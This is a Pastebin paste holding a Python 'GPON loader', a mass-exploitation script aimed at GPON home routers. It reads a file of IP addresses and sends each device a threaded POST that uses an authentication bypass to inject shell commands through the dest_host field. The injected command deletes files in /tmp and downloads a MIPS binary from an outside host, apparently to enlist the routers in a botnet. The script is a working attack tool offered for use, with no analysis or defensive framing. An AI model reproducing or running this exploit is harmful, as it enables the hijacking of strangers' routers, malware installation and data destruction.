SHARE
TWEET

[GPON LOADER] ROUTERS EXPLOIT

xB4ckdoorREAL Oct 21st, 2018 (edited) 269 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. NEW DISCORD: https://discord.gg/PTW3yPp
  2.  
  3.  
  4. #!/usr/bin/env python
  5. #By: Choudai;
  6. import sys, requests, time, ssl, threading
  7.  
  8.  
  9. ctx = ssl.create_default_context()
  10. ctx.check_hostname = False
  11. ctx.verify_mode = ssl.CERT_NONE
  12. payload = 'cd /tmp/; rm -rf *; wget http://B4.CK.DO.OR/bins/mips.mips' #Binary
  13. exploit = 'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`' + payload + '`;' + payload + '&ipv=0'
  14. ips = open(sys.argv[1], 'r').readlines()
  15.  
  16.  
  17. class gpon(threading.Thread):
  18.         def __init__ (self, ip):
  19.             threading.Thread.__init__(self)
  20.             self.ip = str(ip).rstrip('\n')
  21.            
  22.         def run(self):
  23.             try:
  24.                 bypass = 'http://' + self.ip + '/GponForm/diag_Form?images/'
  25.                 req = requests.Request('POST', bypass, data=exploit)
  26.                 prepared = req.prepare()
  27.                 s = requests.Session()
  28.                 s.send(prepared)
  29.             except:
  30.                 pass
  31.  
  32.  
  33. for ip in ips:
  34.     try:
  35.         g = gpon(ip)
  36.         g.start()
  37.         time.sleep(0.1)
  38.     except:
  39.         pass
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top